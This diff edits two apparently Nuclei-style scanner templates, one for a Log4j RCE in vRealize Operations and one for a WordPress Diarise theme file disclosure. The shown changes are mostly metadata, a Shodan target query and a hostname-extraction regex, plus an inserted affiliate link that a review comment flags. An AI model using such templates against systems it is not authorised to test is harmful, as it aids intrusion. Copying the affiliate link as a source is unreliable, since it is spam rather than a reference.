@ -12,9 +12,9 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2021-45046
metadata:
shodan-query: http.title:"vRealize Operations Tenant App"
tags: rce,log4j,vmware,vrealize
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
tags: rce,log4j,vmware,vrealize
requests:
- raw:
@ -46,4 +46,4 @@ requests:
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
# Enhanced by mp on 2022/03/21
# Enhanced by mp on 2022/04/05

View File

@ -1,4 +1,5 @@
id: diarise-theme-lfi
info:
name: WordPress Diarise 1.5.9 Local File Disclosure
author: 0x_Akoko
@ -7,6 +8,9 @@ info:
reference:
- https://packetstormsecurity.com/files/152773/WordPress-Diarise-1.5.9-Local-File-Disclosure.html
- https://cxsecurity.com/issue/WLB-2019050123
- https://woocommerce.com/?aff=1790
classification:
cwe-id: CWE-98
tags: wordpress,wp-theme,lfi
requests:
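Review bot: the added reference https://woocommerce.com/?aff=1790 is an affiliate link, not a source for the vulnerability; remove it. Separately, `cwe-id: CWE-98` (PHP Remote File Inclusion) does not match a local file disclosure; the name says Local File Disclosure and the tag is `lfi`, so CWE-22 (path traversal) is the mapping that agrees with the rest of the template.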
@ -24,3 +28,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/04/05